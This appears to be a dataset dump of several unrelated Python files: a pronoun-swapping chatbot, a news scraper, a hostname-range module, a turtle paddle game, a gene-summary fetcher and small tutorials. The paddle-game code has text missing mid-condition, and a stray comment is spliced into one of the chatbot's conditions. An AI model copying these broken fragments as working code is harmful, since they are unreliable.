sen[index]!=\"might\"):\r\n\t\t\t\t\t\t#print(sen[index])\r\n\t\t\t\t\t\t#print(sen[index+1])\r\n\t\t\t\t\t\t#print(sen[index+2])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"myself\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"yourself\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"yourself\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"myself\"\r\n\t\t\t\t\t\tif(sen[index+2]!=\"can\" and sen[index+2]!=\"could\" and sen[index+2]!=\"may\" and sen[index+2]!=\"might\"):\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\telif(sen[index+2]==\"can\" or sen[index+2]==\"could\" or sen[index+2]==\"may\" or sen[index+2]==\"might\"):\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"i\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\t\t#print(x)\r\n\t\t\t\t\r\n\t\t\treturn x.capitalize()\r\n\r\ndef type2(sen):\r\n\tglobal state\r\n\tif(sen[0]==\"am\" or sen[0]==\"are\" or sen[0]==\"is\" or sen[0]==\"has\" or sen[0]==\"have\" or sen[0]==\"will\" or sen[0]==\"would\" or sen[0]==\"shall\" or sen[0]==\"should\"):\r\n\t\tif(sen[1]==\"i\" or sen[1]==\"it\" or sen[1]==\"we\" or sen[1]==\"he\" or sen[1]==\"she\" or sen[1]==\"they\" or sen[1]==\"you\" ):\r\n\t\t\tif(sen[1]==\"i\" and sen[0]==\"am\" and 
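# mirror first person to second person: 'i am' becomes 'you are' in the reply\r\n\t\t\t\t\t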
state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tsen[0]=\"are\"\r\n\t\t\t\t#print(\"1\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"we\" and sen[0]==\"are\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"you\"\r\n\t\t\t\tsen[0]=\"are\"\r\n\t\t\t\t#print(\"2\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\telif(sen[1]==\"you\" and sen[0]==\"are\" and state==\"0\"):\r\n\t\t\t\tsen[1]=\"i\"\r\n\t\t\t\tsen[0]=\"am\"\r\n\t\t\t\t#print(\"3\")\r\n\t\t\t\tstate=\"1\"\r\n\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\telif(sen[len(sen)-1]==\"something\" and state==\"1\"):\r\n\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\tstate=\"2\"\r\n\t\t\tx=\"\"\r\n\t\t\tx=x+sen[1]+\" \"+sen[0]\r\n\t\t\tfor index in range(2,len(sen),1):\r\n\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and sen[index]!=\"might\"):\r\n\t\t\t\t\t\tif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\t\r\n\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\treturn x.capitalize()\r\n\r\ndef type3(sen):\r\n\tglobal state\r\n\tif(sen[0]==\"when\" or sen[0]==\"where\" or sen[0]==\"what\"):#which,whom,why\r\n\t\tif(sen[1]==\"am\" or sen[1]==\"are\" or sen[1]==\"is\" or sen[1]==\"has\" or sen[1]==\"have\" or sen[1]==\"will\" or sen[1]==\"would\" or sen[1]==\"shall\" or sen[1]==\"should\" or sen[1]==\"do\" or sen[1]==\"must\" or sen[1]==\"might\" or sen[1]==\"could\" or sen[1]==\"will\" or sen[1]==\"may\" or sen[1]==\"does\"):\r\n\t\t\tif(sen[2]==\"i\" or sen[2]==\"it\" or sen[2]==\"we\" or sen[2]==\"he\" or sen[2]==\"she\" or sen[2]==\"they\" or sen[2]==\"you\" or sen[2]==\"your\" or sen[2]==\"their\" ):\r\n\t\t\t\tif(sen[2]==\"i\" and sen[1]==\"am\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tsen[1]=\"are\"\r\n\t\t\t\t\t#print(\"1\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"we\" and sen[1]==\"are\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tsen[1]=\"are\"\r\n\t\t\t\t\t#print(\"2\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"you\" and sen[1]==\"are\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"i\"\r\n\t\t\t\t\tsen[1]=\"am\"\r\n\t\t\t\t\t#print(\"3\")\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"i\" or sen[2]==\"we\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"you\"\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\telif(sen[2]==\"you\" and state==\"0\"):\r\n\t\t\t\t\tsen[2]=\"i\"\r\n\t\t\t\t\tstate=\"1\"\r\n\t\t\t\r\n\t\t\t\tif(sen[len(sen)-1]==\"you\" and state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"me\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\telif(sen[len(sen)-1]==\"me\" and state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"you\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\telif(sen[len(sen)-1]==\"something\" and 
state==\"1\"):\r\n\t\t\t\t\tsen[len(sen)-1]=\"anything\"\r\n\t\t\t\t\tstate=\"2\"\r\n\t\t\t\tx=\"\"\r\n\t\t\t\tx=x+sen[2]+\" \"+sen[1]\r\n\t\t\t\tfor index in range(3,len(sen),1):\r\n\t\t\t\t\tif(index<(len(sen)-2)):\r\n\t\t\t\t\t\tif(sen[index]!=\"i\" and sen[index]!=\"you\" and sen[index]!=\"he\" and sen[index]!=\"she\" and sen[index]!=\"they\" and sen[index]!=\"we\" and sen[index]!=\"it\" and sen[index]!=\"shall\" and sen[index]!=\"will\" and sen[index]!=\"can\" and sen[index]!=\"do\" and sen[index]!=\"may\" and sen[index]!=\"can\" and sen[index]!=\"could\" and sen[index]!=\"would\" and sen[index]!=\"might\"):\r\n\t\t\t\t\t\t\t#print(sen[index])\r\n\t\t\t\t\t\t\t#print(sen[index+1])\r\n\t\t\t\t\t\t\t#print(sen[index+2])\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(sen[index+1]==\"your\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"my\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"my\" or sen[index+1]==\"our\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"your\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"myself\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"yourself\"\r\n\t\t\t\t\t\t\telif(sen[index+1]==\"yourself\"):\r\n\t\t\t\t\t\t\t\tsen[index+1]=\"myself\"\r\n\t\t\t\t\t\t\tif(sen[index+2]!=\"can\" and sen[index+2]!=\"could\" and sen[index+2]!=\"may\" and sen[index+2]!=\"might\"):\r\n\t\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"me\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"me\" or sen[index+1]==\"us\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\telif(sen[index+2]==\"can\" or sen[index+2]==\"could\" or sen[index+2]==\"may\" or sen[index+2]==\"might\"):\r\n\t\t\t\t\t\t\t\tif(sen[index+1]==\"you\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"i\"\r\n\t\t\t\t\t\t\t\telif(sen[index+1]==\"i\" or sen[index+1]==\"we\"):\r\n\t\t\t\t\t\t\t\t\tsen[index+1]=\"you\"\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tx=x+\" \"+sen[index]\r\n\t\t\t\t\t#print(x)\r\n\t\t\t\t\r\n\t\t\t\treturn x.capitalize()\r\n\r\nstateX=\"1\"\r\nprev_ask=\"\"\r\n\t\r\ndef main(sub_imports,ask):\r\n\tglobal stateX,imports\r\n\texists=\"0\"\r\n\tcommands=sub_imports.strip().split(\"\\n\")\r\n\tfor index in range(0,len(commands),1):\r\n\t\tif(commands[index].strip()==\"\"):\r\n\t\t\tcontinue\r\n\t\t#print(\">>> \"+commands[index])\r\n\t\tif(commands[index].split(\":\")[0].strip()==\"dialogue\" and ask.strip(\"?\").strip().lower()==commands[index].split(\":\")[1].strip(\"?\").strip().lower()):\r\n\t\t\texists=\"1\"\r\n\t\t\tif(commands[index+1].split(\":\")[0].strip()==\"response\"):\r\n\t\t\t\tprint(commands[index+1].split(\":\")[1].strip())\r\n\t\t\t\tspeech(commands[index+1].split(\":\")[1].strip())\r\n\t\t\t\tbreak\r\n\t\t\telif(commands[index+1].split(\":\")[0].strip()==\"random\" and commands[index+1].split(\":\")[1].strip()==\"start\"):\r\n\t\t\t\trandvalues=[]\r\n\t\t\t\tfor subindex in range((index+1),len(commands),1):\r\n\t\t\t\t\tif(commands[subindex].strip().split(\":\")[0].strip()==\"response\"):\r\n\t\t\t\t\t\trandvalues.append(commands[subindex].strip())\r\n\t\t\t\t\telif(commands[subindex].strip().split(\":\")[0].strip()==\"random\" and commands[subindex].strip().split(\":\")[1].strip()==\"stop\"):\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tranddata=randvalues[random.randrange(0, len(randvalues), 1)].split(\":\")[1].strip()\r\n\t\t\t\tprint(randdata)\r\n\t\t\t\tspeech(randdata)\r\n\t\tif(ask.strip().lower()==\"exit\"):\r\n\t\t\tstateX=\"0\"\r\n\t\t\tbreak\r\n\t\telif(ask.strip().lower()==\"no\"):\r\n\t\t\treask = input(\"And what 
must be the answer ?: \")\r\n\t\t\tif(reask.strip()!=\"exit\"):\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"r+\")\r\n\t\t\t\tdats=rem.readlines()\r\n\t\t\t\trem.close()\r\n\t\t\t\tfor line in range(0,len(dats),1):\r\n\t\t\t\t\tif(dats[line].strip()==\"\"):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t#print(\">>>dialogue: \"+prev_ask.strip(\"?\").strip())\r\n\t\t\t\t\ttemp=dats[line]\r\n\t\t\t\t\ttemp=temp.replace(\"?\",\"\")\r\n\t\t\t\t\t#print(\"<<<\"+temp.strip())\r\n\t\t\t\t\tif(\"dialogue: \"+prev_ask.strip(\"?\").strip()==temp.strip()):\r\n\t\t\t\t\t\tdats[line+1]=\"response: \"+reask+\"\\n\"\r\n\t\t\t\t\t\t#print(dats[line+1])\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"w+\")\r\n\t\t\t\trem.write(\"\")\r\n\t\t\t\trem.close()\r\n\t\t\t\trem=open(omllibs+\"User_Custom.oml\",\"a+\")\r\n\t\t\t\tfor line in range(0,len(dats),1):\r\n\t\t\t\t\t#print(dats[line])\r\n\t\t\t\t\trem.write(dats[line])\r\n\t\t\t\trem.close()\r\n\t\t\t\timports=\"\"\r\n\t\t\t\treset()\r\n\t\t\tbreak\r\n\t\r\n\tgram_escape=\"0\"\r\n\t\r\n\tif(exists==\"0\" and ask.strip()!=\"exit\" and ask.strip().lower()!=\"no\"):\r\n\t\tstate=\"0\"\r\n\t\tx=ask.lower()\r\n\t\tx=x.replace(\"?\",\"\")\r\n\t\tx=x.strip()\t\r\n\t\tsen=x.split(\" \")\r\n\t\tchoice_arr=[]\r\n\t\tchoice_arr.append(str(type1(sen)))\r\n\t\tchoice_arr.append(str(type2(sen)))\r\n\t\t#choice_arr.append(str(type3(sen)))\r\n\t\tfor ch in choice_arr:\r\n\t\t\tif(ch!=\"None\"):\r\n\t\t\t\tprint(ch)\r\n\t\t\t\tspeech(ch)\r\n\t\t\t\tgram_escape=\"1\"\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\tif(exists==\"0\" and ask.strip()!=\"exit\" and ask.strip().lower()!=\"no\" and gram_escape==\"0\"):\r\n\t\treask = input(\"And what must be the answer ?: \")\r\n\t\tif(reask.strip()!=\"exit\"):\r\n\t\t\tcontent=\"\\ndialogue: \"+ask+\"\\nresponse: \"+reask\r\n\t\t\trem=open(omllibs+\"User_Custom.oml\",\"a+\")\r\n\t\t\trem.write(content)\r\n\t\t\trem.close()\r\n\t\t\timports=\"\"\r\n\t\t\treset()\r\n\r\n\r\nwhile stateX==\"1\":\r\n\t#os.remove(\"osiris.mp3\")\r\n\task = input(\"Say Something: \")\r\n\tif(ask.strip().lower()!=\"no\"):\r\n\t\tprev_ask=ask\r\n\tmain(imports,ask)","repo_name":"akatsukioshiro/Chatbot-Osiris","sub_path":"osiris.py","file_name":"osiris.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9716141995","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n\nimport time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport ScrapyDate\nimport Scrapylog\nimport ScrapyRequests\nimport ScrapyItem\nimport os\n\nif __name__ == '__main__':\n\tlog = Scrapylog.scrapylong()\n\tlog.printlog(1,'start scrapy')\n\tscrapytime = ScrapyDate.DealTime()\n\turl = ScrapyDate.getToutiaoUrl()\n\trequest = ScrapyRequests.getToutiaoInfo()\n\titem = ScrapyItem.getItem()\n\n\tbasedir = 'datadir'\n\tif os.path.exists(basedir) != True:\n\t\tos.mkdir(basedir)\n\tstartTime = scrapytime.getstarttime()\n\twhile scrapytime.getdisTime(scrapytime.nowTime(),startTime) > 0:\n\t\tnowdir = basedir + '\\\\' + str(startTime.year) + '\\\\' + str(startTime.month)\n\t\tif os.path.exists(nowdir) != True: \n\t\t\tos.mkdir(nowdir)\n\t\t\n\t\tfilename = nowdir + '\\\\' + scrapytime.getFilestr(startTime) + '.json'\t#文件名\n\t\trequesturl = url.getUrl(scrapytime.getTimestr(startTime))\t\t\t\t#url\n\t\tif os.path.exists(filename) == False:\n\t\t\tpageinfo = request.getUrlInfo(requesturl)\n\t\t\tif pageinfo != None:\n\t\t\t\titem.combinationjson(pageinfo,filename)\n\n\t\tstartTime = startTime + 
scrapytime.disTime()\n\n\tlog.printlog(1,'end scrapy')\n","repo_name":"whynotAC/AutomatedReports","sub_path":"scrapyitem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36366133392","text":"\"\"\"hostlists range management functions\"\"\"\nimport operator\nimport re\nfrom .plugin_manager import run_plugin_expand\n\n\n# A list of operators we use for set options\nSET_OPERATORS = ['-']\n\n\ndef cmp_compat(a, b):\n    \"\"\"\n    Simple comparison function\n    :param a:\n    :param b:\n    :return:\n    \"\"\"\n    return (a > b) - (a < b)\n\n\ndef compress(hostnames):\n    \"\"\"\n    Compress a list of hosts into a more compact range representation\n    \"\"\"\n    domain_dict = {}\n    result = []\n    for host in hostnames:\n        if '.' in host:\n            domain = '.'.join(host.split('.')[1:])\n        else:\n            domain = ''\n        try:\n            domain_dict[domain].append(host)\n        except KeyError:\n            domain_dict[domain] = [host]\n    domains = list(domain_dict.keys())\n    domains.sort()\n    for domain in domains:\n        hosts = compress_domain(domain_dict[domain])\n        result += hosts\n    return result\n\n\ndef compress_domain(hostnames):\n    \"\"\"\n    Compress a list of hosts in a domain into a more compact representation\n    \"\"\"\n    hostnames.sort()\n    prev_dict = {'prefix': \"\", 'suffix': '', 'number': 0}\n    items = []\n    items_block = []\n    new_hosts = []\n    for host in hostnames:\n        try:\n            parsed_dict = re.match(\n                r\"(?P<prefix>[^0-9]+)(?P<number>\\d+)(?P<suffix>.*).?\",\n                host\n            ).groupdict()\n            # To generate the range we need the entries sorted numerically\n            # but to ensure we don't lose any leading 0s we don't want to\n            # replace the number parameter that is a string with the leading\n            # 0s.\n            parsed_dict['number_int'] = int(parsed_dict['number'])\n            new_hosts.append(parsed_dict)\n        except AttributeError:\n            if '.' 
not in host:\n host += '.'\n parsed_dict = {'host': compress([host])[0].strip('.')}\n else:\n parsed_dict = {'host': host}\n new_hosts.append(parsed_dict)\n new_hosts = multikeysort(new_hosts, ['prefix', 'number_int'])\n for parsed_dict in new_hosts:\n if 'host' in parsed_dict.keys() or \\\n parsed_dict['prefix'] != prev_dict['prefix'] or \\\n parsed_dict['suffix'] != prev_dict['suffix'] or \\\n int(parsed_dict['number']) != int(prev_dict['number']) + 1:\n if len(items_block):\n items.append(items_block)\n items_block = [parsed_dict]\n else:\n items_block.append(parsed_dict)\n prev_dict = parsed_dict\n items.append(items_block)\n result = []\n for item in items:\n if len(item):\n if len(item) == 1 and 'host' in item[0].keys():\n result.append(item[0]['host'])\n elif len(item) == 1:\n result.append(\n '%s%s%s' % (\n item[0]['prefix'], item[0]['number'], item[0]['suffix']\n )\n )\n else:\n result.append(\n '%s[%s-%s]%s' % (\n item[0]['prefix'],\n item[0]['number'],\n item[-1]['number'],\n item[0]['suffix']\n )\n )\n return result\n\n\ndef multikeysort(items, columns):\n comparers = [\n ((operator.itemgetter(col[1:].strip()), -1) if col.startswith('-') else (operator.itemgetter(col.strip()), 1)) for col in columns\n ]\n\n def comparer(left, right):\n for fn, mult in comparers:\n try:\n result = cmp_compat(fn(left), fn(right))\n except KeyError:\n return 0\n if result:\n return mult * result\n else:\n return 0\n try:\n # noinspection PyArgumentList\n return sorted(items, cmp=comparer)\n except TypeError:\n # Python 3 removed the cmp parameter\n import functools\n return sorted(items, key=functools.cmp_to_key(comparer))\n\n\ndef range_split(hosts):\n \"\"\"\n Split up a range string, this needs to separate comma separated\n items unless they are within square brackets and split out set operations\n as separate items.\n \"\"\"\n in_brackets = False\n current = \"\"\n result_list = []\n for c in hosts:\n if c in ['[']:\n in_brackets = True\n if c in [']']:\n in_brackets = False\n if not in_brackets and c == ',':\n result_list.append(current)\n current = \"\"\n # elif not in_brackets and c == '-':\n # result_list.append(current)\n # result_list.append('-')\n # current = \"\"\n elif not in_brackets and c in [','] and len(current) == 0:\n pass\n else:\n current += c\n current = current.strip().strip(',')\n if current:\n result_list.append(current)\n return result_list\n\n\ndef expand(range_list, onepass=False):\n \"\"\"\n Expand a list of lists and set operators into a final host lists\n >>> expand(['foo[01-10]','-','foo[04-06]'])\n ['foo09', 'foo08', 'foo07', 'foo02', 'foo01', 'foo03', 'foo10']\n >>>\n \"\"\"\n if isinstance(range_list, str): # pragma: no cover\n range_list = [h.strip() for h in range_list.split(',')]\n new_list = []\n set1 = None\n operation = None\n for item in range_list:\n if set1 and operation:\n set2 = expand_item(item)\n new_list.append(list(set(set1).difference(set(set2))))\n set1 = None\n operation = None\n elif item in SET_OPERATORS and len(new_list):\n set1 = new_list.pop()\n operation = item\n else:\n expanded_item = expand_item(item, onepass=onepass)\n new_list.append(expanded_item)\n new_list2 = []\n for item in new_list:\n new_list2 += item\n return new_list2\n\n\ndef expand_item(range_list, onepass=False):\n \"\"\" Expand a list of plugin:parameters into a list of hosts \"\"\"\n\n if isinstance(range_list, str):\n range_list = [range_list]\n\n # Iterate through our list\n newlist = []\n found_plugin = False\n for item in range_list:\n # Is the item a plugin\n temp = 
item.split(':')\n found_plugin = False\n if len(temp) > 1:\n plugin = temp[0].lower()\n # Do we have a plugin that matches the passed plugin\n newlist += run_plugin_expand(plugin, ':'.join(temp[1:]).strip(':'))\n found_plugin = True\n else:\n # Default to running through the range plugin\n newlist += run_plugin_expand('range', temp[0])\n\n # Recurse back through ourselves incase a plugin returns a value that\n # needs to be parsed\n # by another plugin. For example a dns resource that has an address that\n # points to a load balancer vip that may container a number of hosts that\n # need to be looked up via the load_balancer plugin.\n if found_plugin and not onepass:\n newlist = expand_item(newlist)\n return newlist\n","repo_name":"dwighthubbard/hostlists","sub_path":"hostlists/range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"27660314229","text":"import turtle\r\nimport math\r\nimport time\r\nimport random\r\n\r\ndef init_screen(): \r\n w = turtle.Screen()\r\n w.clear()\r\n w.title(\"padel game\")\r\n w.bgcolor(\"pink\")\r\n w.setup(width=500,height=530)\r\n w.tracer(0,0)\r\n return w\r\n\r\ndef init_padel():\r\n global t3\r\n t3 = turtle.Turtle()\r\n t3.speed(0)\r\n t3.shape(\"square\")\r\n t3.color(\"purple\")\r\n t3.penup()\r\n t3.shapesize(0.7,3)\r\n t3.goto(0 , -220)\r\n t3.direction = \"istadeh\"\r\n return t3\r\n\r\n\r\n\r\ndef ball():\r\n global high_score\r\n global score\r\n global t1\r\n t1 = turtle.Turtle()\r\n t1.speed(0)\r\n t1.shape(\"circle\")\r\n t1.color(\"black\")\r\n t1.penup()\r\n t1.shapesize(0.9,0.9)\r\n t1.goto(0 , -203)\r\n scrn.update() \r\n update_score()\r\n x = 0\r\n y = -203\r\n theta = 45\r\n v0 = 0.5\r\n t1.penup()\r\n vx = v0 * math.cos ( theta * math.pi/180 )\r\n vy = v0 * math.sin ( theta * math.pi/180 )\r\n t = 0\r\n scrn.update()\r\n while True:\r\n x = x +vx * t\r\n y = vy * t + y\r\n t1.setpos(x,y)\r\n t = t + 0.001\r\n scrn.update()\r\n if int(x) > 230 or int(x) < -230: \r\n vx = -vx \r\n scrn.update()\r\n if int(y) > 230 : \r\n vy = -vy \r\n scrn.update() \r\n for j in range(21): \r\n (x1,y1) = saghf1[j].position() \r\n if (x1 high_score:\r\n high_score = score\r\n score = 0\r\n update_score()\r\n reset_game()\r\n break \r\n\r\ndef reset_game():\r\n head.goto(0 , -220)\r\n scrn.update()\r\n t1.goto(0 , -203)\r\n scrn.update()\r\n #saghf()\r\n \r\n\r\n\r\ndef go_right():\r\n head.forward(50)\r\n scrn.update() \r\n\r\ndef go_left():\r\n head.forward(-50)\r\n scrn.update()\r\n\r\ndef set_random_color(n):\r\n r = random.randint(0,255)\r\n b = random.randint(0,255)\r\n g = random.randint(0,255)\r\n n.color(r,g,b)\r\n\r\ndef saghf():\r\n global saghf1 \r\n x = 210\r\n y = 250 \r\n saghf1 = [ ] \r\n for l in range(3):\r\n y = y - 30 \r\n x = 210 \r\n for i in range(7): \r\n t2 = turtle.Turtle() \r\n turtle.colormode(255) \r\n set_random_color(t2) \r\n scrn.update()\r\n t2.speed(0)\r\n t2.shape(\"square\") \r\n t2.penup()\r\n t2.shapesize(1.3,3.3) \r\n t2.setpos(x,y) \r\n t2.pendown() \r\n scrn.update()\r\n saghf1.append(t2)\r\n x = x - 70\r\n return t2 \r\n\r\n\r\ndef update_score():\r\n score_writer.undo()\r\n score_writer.hideturtle()\r\n score_writer.goto(130,-250 )\r\n s = \"Score: {} High Score: {}\".format(score, high_score)\r\n score_writer.write(s, align=\"center\", font=(\"Courier\", 12, \"normal\")) \r\n \r\ndef init_score_writer():\r\n pen = turtle.Turtle() \r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n 
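# this turtle is never drawn; it only acts as a pen for the score text\r\n    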
pen.color(\"blue\")\r\n pen.penup() \r\n scrn.update()\r\n pen.hideturtle()\r\n return pen\r\n\r\nscore = 0\r\nhigh_score = 0\r\ntime.sleep(0.1)\r\nwhile True:\r\n scrn = init_screen()\r\n #scrn.clear()\r\n head = init_padel()\r\n score_writer = init_score_writer()\r\n saghf()\r\n win= turtle.Screen()\r\n win.listen()\r\n win.onkey(go_right,\"Right\") \r\n win.onkey(go_left,\"Left\")\r\n ball()\r\n update_score()\r\n scrn.update()\r\n #time.sleep(0.1)\r\nturtle.mainloop()\r\n \r\n\r\n\r\n\r\n","repo_name":"helia-vafaei/padel_game","sub_path":"game-padel.py","file_name":"game-padel.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37666482229","text":"import pandas as pd\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\nprint('import done')\n\nEntrez.email = 'scdyao@gmail.com'\n\ndf = pd.read_excel(r'C:\\Users\\sc-dyao\\Desktop\\REHS-2019\\Py3.7\\entrez\\gene_result.xlsx')\n\nstring = ''\nfor gene in df['GeneID']:\n string += (str(gene) + ',')\n\n#string = '21,26090,79611,8754,54507'\n\n#print(string)\n#raise SystemExit\n\nentFile = Entrez.efetch(db='gene', id=string)\nprint('fetched data')\nentData = entFile.read()\nprint('read data')\n\noutput = open('gene_summaries.txt', 'w')\nnewGeneStart = 0\nnewGeneEnd = 0\nwhile newGeneEnd != -1:\n newGeneEnd = entData.find('Entrezgene', newGeneStart+1)\n startInd = entData.find('summary \"', newGeneStart, newGeneEnd)\n if startInd == -1:\n summary = \"\"\n else:\n endInd = entData.find('\"', startInd+9)\n summary = entData[startInd+9:endInd].replace('\\n', '')\n output.write(summary + '\\n')\n newGeneStart = newGeneEnd\noutput.close()\n","repo_name":"dyaom/REHS-2019","sub_path":"Py3.7/entrez/gene_description.py","file_name":"gene_description.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22508485407","text":"list = []\r\nops = []\r\nN = 12\r\n#N = int(input())\r\n# for i in range(N) :\r\n# string = input().split()\r\n# # array with all the operations\r\n# ops.append(string)\r\nops = ['insert 0 5','insert 1 10','insert 0 6','print','remove 6','append 9','append 1','sort','print','pop','reverse','print']\r\nfor j in ops :\r\n j = j.split() \r\n operation = j[0]\r\n \r\n if len(j) == 2 :\r\n e = int(j[1])\r\n elif len(j) == 3 :\r\n i = int(j[1])\r\n e = int(j[2])\r\n \r\n if operation == 'insert' :\r\n list.insert(i,e)\r\n elif operation == 'print' :\r\n print(list)\r\n elif operation == 'remove' :\r\n list.remove(e)\r\n elif operation == 'append' :\r\n list.append(e)\r\n elif operation == 'sort' :\r\n list.sort()\r\n elif operation == 'pop' :\r\n list.pop()\r\n elif operation == 'reverse' :\r\n list.reverse()\r\n","repo_name":"chusk2/python-code","sub_path":"list_operations.py","file_name":"list_operations.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19781678217","text":"# Loops\nprint('\\nNormal for loop')\nfor i in range(5):\n print(i)\n\nprint('\\nWhile loop')\nj = 5\nwhile j > 0:\n print(j)\n j -= 1\n\n# Loops in lists\nprint('\\nFor in lists')\nroles = ['admin', 'user', 'guest']\nfor role in roles:\n print(role)\n\n# Loops in dictionaries\nprint('\\nFor in dictionaries')\nprofessor = {\n 'name': 'Cesar Jaramillo',\n 'age': 40,\n 'degree': 'PhD'\n}\nfor key, value in professor.items():\n print(f'{key}: 
